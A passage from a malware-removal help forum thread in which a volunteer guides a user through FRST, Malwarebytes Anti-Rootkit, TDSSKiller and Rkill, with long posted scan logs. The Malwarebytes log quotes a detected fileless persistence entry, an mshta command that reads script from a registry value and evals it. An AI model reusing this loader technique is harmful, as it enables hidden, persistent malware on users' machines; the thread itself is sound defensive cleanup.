2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca
End

On the top menu of the Notepad document click on File and then in Save as. A new window will open.

On the Filename box field type fixlist then select Desktop and click the Save button.

Now, go to the Desktop and right-click the FRST64 icon and select Run as administrator to start the tool.
Click the Fix button only once and wait.
When finished FRST will generate a log on the Desktop named fixlog.txt. Please post its entire content in your next reply.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

 

 

 

Then read the instructions in my previous post to download, install and perform the scans with Malwarebytes Anti-Rootkit and RogueKiller and post the produced logs.

 

Please let me know if anything is unclear.

 

Thank you.

 


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#11 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 09 April 2017 - 05:13 PM

Ooopss....

 

I did not noticed that you have already replied. Please ignore my previous post.

 

Okay, I will wait for the logs of Malwarebytes Anti-Rootkit and RogueKiller.

 

Thank you.


Edited by Android 8888, 09 April 2017 - 05:22 PM.

Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#12 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 09 April 2017 - 05:52 PM

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.04.09.05
  rootkit: v2017.04.02.01

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18617
KEKLR :: KEKLR-PC [administrator]

4/9/2017 6:09:49 PM
mbar-log-2017-04-09 (18-09-49).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 312272
Time elapsed: 33 minute(s), 9 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [5eab8f60575179bd3f53f47ffa078e72]

Registry Values Detected: 1
HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: mshta "about:<script>tRAs5G="HjKZ9";B4x=new ActiveXObject("WScript.Shell");pU8mN3="ra69lmc";Nn7wN2=B4x.RegRead("HKCU\\software\\qyhgeurf\\hfuzav");i7YHDY7="jo";eval(Nn7wN2);YfQ7U7="NNW";</script>" -> Delete on reboot. [5eab8f60575179bd3f53f47ffa078e72]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)



#13 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 09 April 2017 - 06:28 PM

I ran the last scan RogueKiller. It closed itself, I don't see "Open Report".

Also when I open internet explorer, after I ran the first scan of the three, I get a message, trying to change my homepage to something about Microsoft. It doesn't stay up long enough to get the exact link.

 

 

added:

I closed browser and opened again, I'm not getting the warning now about changing my homepage.


Edited by krtate, 09 April 2017 - 06:47 PM.


#14 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 10 April 2017 - 02:51 PM

Hello krtate.

 

Thank you for the log and for keeping me informed.

Okay please try the following tool to see if it finds any remnants of the rootkit.

  • Download TDSSKiller from BleepingComputer, then move the executable file on your Desktop;
  • Right-click on tdsskiller.exe and select Run as Administrator;
  • Accept the End User License Agreement (EULA) and the KSN Statement;
  • Once the application is done initializing, click on the Change parameters blue link;
  • In addition to the current checked boxes, check these two as well:
    • Verify file digital signature;
    • Detect TDLFS file system;
  • Once done, click on OK then click on Start scan;
  • After the scan is complete, click on the Report button, in the top right corner;
  • A report window will open with the scan log. Copy and paste it in your next reply;

 

How is the computer running at this point?

 

Android 8888


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#15 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 10 April 2017 - 04:50 PM

I'm running the TDSSKiller, it has a pop up stating 2 unsigned files LightScribeService and ose. Provides an option to skip, copy to quarantine or delete.  It won't let me select Report until I do something with this pop up.

 

I ran Malwarebytes last night again and the rootkit is still there.   I don't think the RogueKiller completed running.



#16 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 10 April 2017 - 05:24 PM

Just quarantine the files, do not delete them. Then post the log, please.

 

 

For the RogueKiller, please try the following:

 

Please download Rkill by Grinler from one of these links:

Rkill.exe
Rkill.com
Rkill.scr


Save Rkill to your Desktop.
Right click on the icon and choose Run as administrator to run the tool and click Yes.

Note: If the first one does not run successfully, download and try the other copies (with a different file extensions) and see if one of them will run.
When completed it will create a log. Please post its content on your next reply.
 
 
Important: DO NOT reboot your computer at this moment. If it does reboot, then please run the program again.
 
Once Rkill has successfully run, try to run RogueKiller again immediately.

 

Please post the TDSSKiller log and the RogueKiller log.

 

Thank you.

 

 


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#17 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 10 April 2017 - 06:17 PM

17:31:42.0666 0x10a0 TDSS rootkit removing tool 3.1.0.12 Nov 7 2016 07:10:01

17:31:59.0290 0x10a0 ============================================================

17:31:59.0290 0x10a0 Current date / time: 2017/04/10 17:31:59.0290

17:31:59.0290 0x10a0 SystemInfo:

17:31:59.0290 0x10a0

17:31:59.0290 0x10a0 OS Version: 6.1.7601 ServicePack: 1.0

17:31:59.0290 0x10a0 Product type: Workstation

17:31:59.0290 0x10a0 ComputerName: KEKLR-PC

17:31:59.0290 0x10a0 UserName: KEKLR

17:31:59.0290 0x10a0 Windows directory: C:\Windows

17:31:59.0290 0x10a0 System windows directory: C:\Windows

17:31:59.0290 0x10a0 Running under WOW64

17:31:59.0290 0x10a0 Processor architecture: Intel x64

17:31:59.0290 0x10a0 Number of processors: 2

17:31:59.0290 0x10a0 Page size: 0x1000

17:31:59.0290 0x10a0 Boot type: Normal boot

17:31:59.0290 0x10a0 CodeIntegrityOptions = 0x00000001

17:31:59.0290 0x10a0 ============================================================

17:31:59.0890 0x10a0 KLMD registered as C:\Windows\system32\drivers\80139537.sys

17:31:59.0890 0x10a0 KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 7601.23677, osProperties = 0x1

17:32:02.0686 0x10a0 System UUID: {672B5EF1-D76A-44C1-278D-9FEAABFAE7DA}

17:32:04.0569 0x10a0 Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040

17:32:04.0784 0x10a0 ============================================================

17:32:04.0784 0x10a0 \Device\Harddisk0\DR0:

17:32:04.0785 0x10a0 MBR partitions:

17:32:04.0785 0x10a0 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800

17:32:04.0785 0x10a0 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0x23A58800

17:32:04.0785 0x10a0 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x23ABC800, BlocksNum 0x1971800

17:32:04.0785 0x10a0 ============================================================

17:32:04.0814 0x10a0 C: <-> \Device\Harddisk0\DR0\Partition2

17:32:04.0858 0x10a0 D: <-> \Device\Harddisk0\DR0\Partition3

17:32:04.0896 0x10a0 ============================================================

17:32:04.0896 0x10a0 Initialize success

17:32:04.0896 0x10a0 ============================================================

17:32:28.0342 0x1b50 ============================================================

17:32:28.0342 0x1b50 Scan started

17:32:28.0342 0x1b50 Mode: Manual; SigCheck; TDLFS;

17:32:28.0342 0x1b50 ============================================================

17:32:28.0342 0x1b50 KSN ping started

17:32:28.0512 0x1b50 KSN ping finished: true

17:32:29.0564 0x1b50 ================ Scan system memory ========================

17:32:29.0564 0x1b50 System memory - ok

17:32:29.0564 0x1b50 ================ Scan services =============================

17:32:29.0784 0x1b50 [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci C:\Windows\system32\drivers\1394ohci.sys

17:32:29.0926 0x1b50 1394ohci - ok

17:32:29.0996 0x1b50 [ 5C368F4B04ED2A923E6AFCA2D37BAFF5, C3CC58D636B18DF77C4C4B384AD1DE78418716A0606E564DBC63782D5EA02905 ] Accelerometer C:\Windows\system32\DRIVERS\Accelerometer.sys

17:32:30.0086 0x1b50 Accelerometer - ok

17:32:30.0126 0x1b50 [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI C:\Windows\system32\drivers\ACPI.sys

17:32:30.0146 0x1b50 ACPI - ok

17:32:30.0186 0x1b50 [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi C:\Windows\system32\drivers\acpipmi.sys

17:32:30.0216 0x1b50 AcpiPmi - ok

17:32:30.0346 0x1b50 [ B932E0EE190778D840F1442DFC0F9612, 8780963F14D57279FDD585BE945ED40F24590D32676C7A9EF94002D38B8BA643 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

17:32:30.0376 0x1b50 AdobeARMservice - ok

17:32:30.0516 0x1b50 [ 7EB7A3B01751889C6459C51A74CC87FA, 088EF5CA10D439905822A3DFFEFD2D3416198F10EAAF8C235771CDB3DF86E82C ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

17:32:30.0556 0x1b50 AdobeFlashPlayerUpdateSvc - ok

17:32:30.0606 0x1b50 [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx C:\Windows\system32\DRIVERS\adp94xx.sys

17:32:30.0636 0x1b50 adp94xx - ok

17:32:30.0676 0x1b50 [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci C:\Windows\system32\DRIVERS\adpahci.sys

17:32:30.0696 0x1b50 adpahci - ok

17:32:30.0716 0x1b50 [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320 C:\Windows\system32\DRIVERS\adpu320.sys

17:32:30.0736 0x1b50 adpu320 - ok

17:32:30.0776 0x1b50 [ 262D7C87D0AC20B96EF9877D3CA478A0, 54F7E5A5F8991C5525500C1ECCF3D3135D13F48866C366E52DF1D052DB2EE15B ] AeLookupSvc C:\Windows\System32\aelupsvc.dll

17:32:30.0866 0x1b50 AeLookupSvc - ok

17:32:30.0966 0x1b50 [ A6FB9DB8F1A86861D955FD6975977AE0, 788C6EE50719227D7A9B7F08C8D5E1289FCD0E8AC23A1021A5093D2E8368F696 ] AESTFilters C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe

17:32:31.0066 0x1b50 AESTFilters - ok

17:32:31.0146 0x1b50 [ 9A4A1EEE802BF2F878EE8EAB407B21B7, 177EB7DF4B35FE4C0E45E775A0FD5D48D39B410052E3EE18BDEEC809E152D9D8 ] AFD C:\Windows\system32\drivers\afd.sys

17:32:31.0296 0x1b50 AFD - ok

17:32:31.0336 0x1b50 [ B65F8DBA54F251906BBE8611B5A0E7AB, 9ADE347CB4E7C33D668DAC79A316C97C78D94D296B158F481F3E32F9DA4D647E ] AgereModemAudio C:\Program Files\LSI SoftModem\agr64svc.exe

17:32:31.0506 0x1b50 AgereModemAudio - ok

17:32:31.0586 0x1b50 [ AF4748EF93416159459769A24A0053AF, AE1C4E67E7555066436112C5A090DC5B49B264E3BA3ECF4CE2F1E9B799089B7D ] AgereSoftModem C:\Windows\system32\DRIVERS\agrsm64.sys

17:32:31.0686 0x1b50 AgereSoftModem - ok

17:32:31.0746 0x1b50 [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440 C:\Windows\system32\drivers\agp440.sys

17:32:31.0776 0x1b50 agp440 - ok

17:32:31.0816 0x1b50 [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG C:\Windows\System32\alg.exe

17:32:31.0856 0x1b50 ALG - ok

17:32:31.0916 0x1b50 [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide C:\Windows\system32\drivers\aliide.sys

17:32:31.0936 0x1b50 aliide - ok

17:32:31.0976 0x1b50 [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide C:\Windows\system32\drivers\amdide.sys

17:32:32.0006 0x1b50 amdide - ok

17:32:32.0036 0x1b50 [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8 C:\Windows\system32\DRIVERS\amdk8.sys

17:32:32.0076 0x1b50 AmdK8 - ok

17:32:32.0116 0x1b50 [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM C:\Windows\system32\DRIVERS\amdppm.sys

17:32:32.0136 0x1b50 AmdPPM - ok

17:32:32.0166 0x1b50 [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata C:\Windows\system32\drivers\amdsata.sys

17:32:32.0186 0x1b50 amdsata - ok

17:32:32.0226 0x1b50 [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs C:\Windows\system32\DRIVERS\amdsbs.sys

17:32:32.0236 0x1b50 amdsbs - ok

17:32:32.0276 0x1b50 [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata C:\Windows\system32\drivers\amdxata.sys

17:32:32.0296 0x1b50 amdxata - ok

17:32:32.0346 0x1b50 [ B84DDCCB03A9CEDC1E90A88EDA5306DB, 1E51A7336C7E3F6402ED90AB0B3E98FD3827E2DC51B133E7F8BB37140B315192 ] AppID C:\Windows\system32\drivers\appid.sys

17:32:32.0446 0x1b50 AppID - ok

17:32:32.0456 0x1b50 [ 02B60F8FA4BAB8DC3B14782A7E60564B, D7EB27CB202573734D7A4EB4667B9BCEC1598AA9EBD154F2C9266AF230F51A52 ] AppIDSvc C:\Windows\System32\appidsvc.dll

17:32:32.0526 0x1b50 AppIDSvc - ok

17:32:32.0556 0x1b50 [ DE23E052E557580674785CDF45B613F3, A955ADC6CC7D816BA7CE1065F911E7A3295A1908C22BE0A3C506C38CFEE8DE0D ] Appinfo C:\Windows\System32\appinfo.dll

17:32:32.0606 0x1b50 Appinfo - ok

17:32:32.0636 0x1b50 [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc C:\Windows\system32\DRIVERS\arc.sys

17:32:32.0656 0x1b50 arc - ok

17:32:32.0666 0x1b50 [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas C:\Windows\system32\DRIVERS\arcsas.sys

17:32:32.0686 0x1b50 arcsas - ok

17:32:32.0816 0x1b50 [ EE424A5CE56E3923D59BB7DE2E15036D, 8B8196870EFE74D43EDA72674021A46846D370E97A6A058134D84A721AECD091 ] aspnet_state C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

17:32:32.0876 0x1b50 aspnet_state - ok

17:32:32.0926 0x1b50 [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys

17:32:33.0136 0x1b50 AsyncMac - ok

17:32:33.0186 0x1b50 [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi C:\Windows\system32\drivers\atapi.sys

17:32:33.0196 0x1b50 atapi - ok

17:32:33.0426 0x1b50 [ 3EFD964D52221360AF0673CD61C2F4F5, 76D636CAF2E4FEDAAC6B0D958865A901340CF836EE4FCE59F1D5291E3BEC9F1E ] atikmdag C:\Windows\system32\drivers\atikmdag.sys

17:32:33.0616 0x1b50 atikmdag - ok

17:32:33.0696 0x1b50 [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll

17:32:33.0746 0x1b50 AudioEndpointBuilder - ok

17:32:33.0766 0x1b50 [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioSrv C:\Windows\System32\Audiosrv.dll

17:32:33.0796 0x1b50 AudioSrv - ok

17:32:33.0856 0x1b50 [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV C:\Windows\System32\AxInstSV.dll

17:32:33.0996 0x1b50 AxInstSV - ok

17:32:34.0046 0x1b50 [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv C:\Windows\system32\DRIVERS\bxvbda.sys

17:32:34.0126 0x1b50 b06bdrv - ok

17:32:34.0186 0x1b50 [ B5ACE6968304A3900EEB1EBFD9622DF2, 1DAA118D8CA3F97B34DF3D3CDA1C78EAB2ED225699FEABE89D331AE0CB7679FA ] b57nd60a C:\Windows\system32\DRIVERS\b57nd60a.sys

17:32:34.0236 0x1b50 b57nd60a - ok

17:32:34.0266 0x1b50 [ FDE360167101B4E45A96F939F388AEB0, 8D1457E866BBD645C4B9710DFBFF93405CC1193BF9AE42326F2382500B713B82 ] BDESVC C:\Windows\System32\bdesvc.dll

17:32:34.0336 0x1b50 BDESVC - ok

17:32:34.0356 0x1b50 [ 16A47CE2DECC9B099349A5F840654746, 77C008AEDB07FAC66413841D65C952DDB56FE7DCA5E9EF9C8F4130336B838024 ] Beep C:\Windows\system32\drivers\Beep.sys

17:32:34.0416 0x1b50 Beep - ok

17:32:34.0506 0x1b50 [ 82974D6A2FD19445CC5171FC378668A4, 075D25F47C0D2277E40AF8615571DAA5EB16B1824563632A9A7EC62505C29A4A ] BFE C:\Windows\System32\bfe.dll

17:32:34.0596 0x1b50 BFE - ok

17:32:34.0656 0x1b50 [ 1EA7969E3271CBC59E1730697DC74682, D511A34D63A6E0E6E7D1879068E2CD3D87ABEAF4936B2EA8CDDAD9F79D60FA04 ] BITS C:\Windows\system32\qmgr.dll

17:32:34.0756 0x1b50 BITS - ok

17:32:34.0796 0x1b50 [ 61583EE3C3A17003C4ACD0475646B4D3, 17E4BECC309C450E7E44F59A9C0BBC24D21BDC66DFBA65B8F198A00BB47A9811 ] blbdrive C:\Windows\system32\DRIVERS\blbdrive.sys

17:32:34.0826 0x1b50 blbdrive - ok

17:32:34.0856 0x1b50 [ ABA3984C822E4D3F889699912D85D6C5, 2251FA135CC290DA13DAE4743F393C7CC9E6A737C054707CB8D72C369D1FFACB ] bowser C:\Windows\system32\DRIVERS\bowser.sys

17:32:35.0008 0x1b50 bowser - ok

17:32:35.0028 0x1b50 [ F09EEE9EDC320B5E1501F749FDE686C8, 66691114C42E12F4CC6DC4078D4D2FA4029759ACDAF1B59D17383487180E84E3 ] BrFiltLo C:\Windows\system32\DRIVERS\BrFiltLo.sys

17:32:35.0068 0x1b50 BrFiltLo - ok

17:32:35.0088 0x1b50 [ B114D3098E9BDB8BEA8B053685831BE6, 0ED23C1897F35FA00B9C2848DE4ED200E18688AA7825674888054BBC3A3EB92C ] BrFiltUp C:\Windows\system32\DRIVERS\BrFiltUp.sys

17:32:35.0128 0x1b50 BrFiltUp - ok

17:32:35.0168 0x1b50 [ 5C2F352A4E961D72518261257AAE204B, 9EE1001E1D46A414A7A86FE1DBBE232203E26F54D9EF43ED31ED8EACD4D09853 ] BridgeMP C:\Windows\system32\DRIVERS\bridge.sys

17:32:35.0218 0x1b50 BridgeMP - ok

17:32:35.0278 0x1b50 [ 05F5A0D14A2EE1D8255C2AA0E9E8E694, 40011138869F5496A3E78D38C9900B466B6F3877526AC22952DCD528173F4645 ] Browser C:\Windows\System32\browser.dll

17:32:35.0358 0x1b50 Browser - ok

17:32:35.0388 0x1b50 [ 43BEA8D483BF1870F018E2D02E06A5BD, 4E6F5A5FD8C796A110B0DC9FF29E31EA78C04518FC1C840EF61BABD58AB10272 ] Brserid C:\Windows\System32\Drivers\Brserid.sys

17:32:35.0438 0x1b50 Brserid - ok

17:32:35.0448 0x1b50 [ A6ECA2151B08A09CACECA35C07F05B42, E2875BB7768ABAF38C3377007AA0A3C281503474D1831E396FB6599721586B0C ] BrSerWdm C:\Windows\System32\Drivers\BrSerWdm.sys

17:32:35.0478 0x1b50 BrSerWdm - ok

17:32:35.0498 0x1b50 [ B79968002C277E869CF38BD22CD61524, 50631836502237AF4893ECDCEA43B9031C3DE97433F594D46AF7C3C77F331983 ] BrUsbMdm C:\Windows\System32\Drivers\BrUsbMdm.sys

17:32:35.0518 0x1b50 BrUsbMdm - ok

17:32:35.0528 0x1b50 [ A87528880231C54E75EA7A44943B38BF, 4C8BBB29FDA76A96840AA47A8613C15D4466F9273A13941C19507008629709C9 ] BrUsbSer C:\Windows\System32\Drivers\BrUsbSer.sys

17:32:35.0568 0x1b50 BrUsbSer - ok

17:32:35.0618 0x1b50 [ CF98190A94F62E405C8CB255018B2315, E1B2540023C4FE9FD588E4B6AE6347DFA565EB3898F21E5360882BF3E8B5E781 ] BthEnum C:\Windows\system32\drivers\BthEnum.sys

17:32:35.0708 0x1b50 BthEnum - ok

17:32:35.0738 0x1b50 [ 9DA669F11D1F894AB4EB69BF546A42E8, B498B8B6CEF957B73179D1ADAF084BBB57BB3735D810F9BE2C7B1D58A4FD25A4 ] BTHMODEM C:\Windows\system32\DRIVERS\bthmodem.sys

17:32:35.0758 0x1b50 BTHMODEM - ok

17:32:35.0788 0x1b50 [ 02DD601B708DD0667E1331FA8518E9FF, 7DE6CC4DBB621CD03B01D9CE6CF66EAFE31D39030A391562CD0E278E1D70ADE1 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys

17:32:35.0858 0x1b50 BthPan - ok

17:32:35.0898 0x1b50 [ 738D0E9272F59EB7A1449C3EC118E6C4, FE3D32C2A5E4DC21376A0F89C0B2EE024ECF1A3FB99213CC9BBC986ADF7AF080 ] BTHPORT C:\Windows\System32\Drivers\BTHport.sys

17:32:35.0948 0x1b50 BTHPORT - ok

17:32:35.0968 0x1b50 [ 95F9C2976059462CBBF227F7AAB10DE9, 2797AE919FF7606B070FB039CECDB0707CD2131DCAC09C5DF14F443D881C9F34 ] bthserv C:\Windows\system32\bthserv.dll

17:32:36.0008 0x1b50 bthserv - ok

17:32:36.0038 0x1b50 [ F188B7394D81010767B6DF3178519A37, 576304E92FD94908F093A6AB5F4D328F25829BE32EC3CA0D29EBFDF5DE83539B ] BTHUSB C:\Windows\System32\Drivers\BTHUSB.sys

17:32:36.0068 0x1b50 BTHUSB - ok

17:32:36.0098 0x1b50 [ 6BCFDC2B5B7F66D484486D4BD4B39A6B, 2A2039DD524E989EA91B7C91D5F295C663D1E27ABD64777D2F3137EB1C42C258 ] btwaudio C:\Windows\system32\drivers\btwaudio.sys

17:32:36.0108 0x1b50 btwaudio - ok

17:32:36.0128 0x1b50 [ 82DC8B7C626E526681C1BEBED2BC3FF9, 58260E88CDD7388ABA563F9B8F2F3FA17022DB9E4C56EBA0761E99B919A8EAF8 ] btwavdt C:\Windows\system32\DRIVERS\btwavdt.sys

17:32:36.0138 0x1b50 btwavdt - ok

17:32:36.0208 0x1b50 [ 17DA11C703B8E86AC3DF8F796A118AEF, 2E81930590742F876F8147B2CBC32AE9A6883B7E924EF20278243A8AC53F5BA4 ] btwdins C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe

17:32:36.0248 0x1b50 btwdins - ok

17:32:36.0268 0x1b50 [ 6149301DC3F81D6F9667A3FBAC410975, 120E201AFB07054C7F6321461D194843C695012431DBD791E36BBF73FDD41E8A ] btwl2cap C:\Windows\system32\DRIVERS\btwl2cap.sys

17:32:36.0278 0x1b50 btwl2cap - ok

17:32:36.0288 0x1b50 [ 28E105AD3B79F440BF94780F507BF66A, EF4E6CCAB16765E2C88666625C13CB3299B668159A94CB201E3B44701A30640A ] btwrchid C:\Windows\system32\DRIVERS\btwrchid.sys

17:32:36.0298 0x1b50 btwrchid - ok

17:32:36.0328 0x1b50 [ B8BD2BB284668C84865658C77574381A, 6C55BA288B626DF172FDFEA0BD7027FAEBA1F44EF20AB55160D7C7DC6E717D65 ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys

17:32:36.0378 0x1b50 cdfs - ok

17:32:36.0428 0x1b50 [ F036CE71586E93D94DAB220D7BDF4416, BD07AAD9E20CEAF9FC84E4977C55EA2C45604A2C682AC70B9B9A2199B6713D5B ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys

17:32:36.0468 0x1b50 cdrom - ok

17:32:36.0528 0x1b50 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] CertPropSvc C:\Windows\System32\certprop.dll

17:32:36.0608 0x1b50 CertPropSvc - ok

17:32:36.0638 0x1b50 [ D7CD5C4E1B71FA62050515314CFB52CF, 513B5A849899F379F0BC6AB3A8A05C3493C2393C95F036612B96EC6E252E1C64 ] circlass C:\Windows\system32\DRIVERS\circlass.sys

17:32:36.0678 0x1b50 circlass - ok

17:32:36.0718 0x1b50 [ 3D67C27DD17B254D7915FA16A5AE3573, 5B3A6C6A7F940C06362775DAF13CEADA37C7AA84A509458A57C23B4369970A90 ] CLFS C:\Windows\system32\CLFS.sys

17:32:36.0748 0x1b50 CLFS - ok

17:32:37.0178 0x1b50 [ F7BCDE28B6F0A57AD443DF3AA26F0052, A2AD94A8B89B22C5AD4B6926617338E867392A27F166CB70591788EC8651387F ] ClickToRunSvc C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

17:32:37.0329 0x1b50 ClickToRunSvc - ok

17:32:37.0402 0x1b50 [ F13EC8A783E0CB0D6DC26A3CA848B7B8, 0809E3B71709F1343086EEB6C820543C1A7119E74EEF8AC1AEE1F81093ABEC66 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

17:32:37.0422 0x1b50 clr_optimization_v2.0.50727_32 - ok

17:32:37.0482 0x1b50 [ B4D73F04E9BC076F7CDAC4327DF636BB, 1ADED20D5A0D0A76E2F85CB778FD06BAB814868D35F8532E17D67045FF4770C2 ] clr_optimization_v2.0.50727_64 C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

17:32:37.0502 0x1b50 clr_optimization_v2.0.50727_64 - ok

17:32:37.0592 0x1b50 [ 5BAF4F1296D4D91FC28560CDB4C37C4B, ACA4BC57ED1F8432F18F0F215EC7FF956BAEF6E02760779E264E4008A979E9DD ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

17:32:37.0642 0x1b50 clr_optimization_v4.0.30319_32 - ok

